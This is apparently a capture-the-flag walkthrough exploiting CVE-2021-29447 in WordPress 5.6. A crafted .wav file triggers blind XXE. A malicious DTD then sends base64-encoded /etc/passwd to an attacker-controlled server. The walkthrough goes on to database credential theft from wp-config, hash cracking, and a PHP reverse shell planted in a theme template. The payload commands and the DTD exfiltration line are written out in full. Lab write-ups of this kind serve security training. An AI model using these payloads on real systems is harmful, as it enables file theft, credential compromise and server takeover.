Wordpress: CVE-2021-29447

Wordpress 5.6 - Malicious .wav file - Blind XXE Injection - LFI - MySQL DB Enumeration

Initial Enumeration

  • All the enumeration has already been done and a user:pass has been supplied - This particular version of WP is vulnerable to XXE

  • When we log on to the portal, we can find that the user test-corp has a upload functionality of uploading media files in the extension of .wav

  • Our next step is to create a malicious wave file (.wav). However, the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition controlled by the attacker

echo -en ‘RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=”1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM ‘“‘“‘http://YOURSEVERIP:PORT/MALICIOUS.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav_

  • Meanwhile, create a malicious DTD and start a php server ( php -S 0.0.0.0:8888 )in your local system so that the blind XXE payload fetches the DTD and returns in the response

# Malicious DTD

<!ENTITY % file SYSTEM “php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd”>

<!ENTITY % init “<!ENTITY &#x25; trick SYSTEM ‘http://YOURSERVERIP:PORT/?p=%file;'>" >

  • Now when we upload the .wav file, we can notice some exchanges going on our php server session but all are zlib base64 encrypted

  • Inorder to decrypt it, we can use

<?php echo zlib_decode(base64_decode(‘base64here’)); ?>

  • On decoding it, we get the contents of /etc/passwd

Actual Thinking

  • Now that we have a LFI to disclose sensitive details in the system and since the web server is running Wordpress - we can immediately check for the wp-config file to enumerate further

  • Dumping the config file gave us the Backend DB's credentials - MySQL

mysql -h <TARGET IP> -u <USERNAME> -p

Enumerate the DB

> show databases;
> use wordpress2;
> show tables;
> SELECT * FROM wptry_users;

  • Got a higher level authorized user's hash, using john to crack it with the help of rockyou.txt

  • Logging on to the /wp-admin portal again with the obtained user:pass

  • Checking for the template functionalities and changing the 404.php into a php-reverse shell

  • We can grab the flag at the only users home directory !

PreviousMustacchioNextBounty Hacker

Last updated